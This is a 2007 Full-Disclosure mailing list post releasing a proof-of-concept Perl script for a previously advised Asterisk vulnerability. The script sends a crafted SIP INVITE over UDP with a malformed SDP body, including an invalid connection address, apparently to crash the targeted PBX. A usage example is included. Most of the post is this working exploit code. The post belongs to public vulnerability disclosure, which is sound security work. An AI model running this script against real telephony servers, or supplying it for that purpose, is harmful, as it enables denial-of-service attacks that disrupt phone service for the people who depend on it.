From: Radu State (stateloria.fr)
Date: Sat Mar 24 2007 - 08:11:29 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Due to many requests for the POC and since most Asterisk systems should
have been patched by now, please find in this message the POc for our
advisory posted on

 <http://seclists.org/fulldisclosure/2007/Mar/0315.html>
http://seclists.org/fulldisclosure/2007/Mar/0315.html

usage example:

perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <dport> <dusername> <src> <sport> <susername>" unless
($ARGV[5]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

$msg="INVITE sip:$ARGV[2]\$ARGV[0]:$ARGV[1] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3]:$ARGV[4];branch=01;rport\r\nTo:
<sip:$ARGV[2]\$ARGV[0]:$ARGV[1]>\r\nFrom:
<sip:$ARGV[3]:$ARGV[4]>;tag=01\r\nCall-ID: 01\$ARGV[3]\r\nContent-Type:
application/sdp\r\nCSeq: 01 INVITE\r\nContent-Length:
187\r\n\r\nv=0\r\no=root 25903 25903 IN IP4 $ARGV[3]\r\ns=session\r\nc=IN
IP4 $ARGV[3]\r\nc=IN IP4 910.188.8.2\r\nt=0 0\r\nm=audio 13956 RTP/AVP 0 4 3
8 111 5 10 7 18 110 97 101\r\na=rtpmap:98 speex/16000\r\n\r\n";

$socket->send($msg);

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]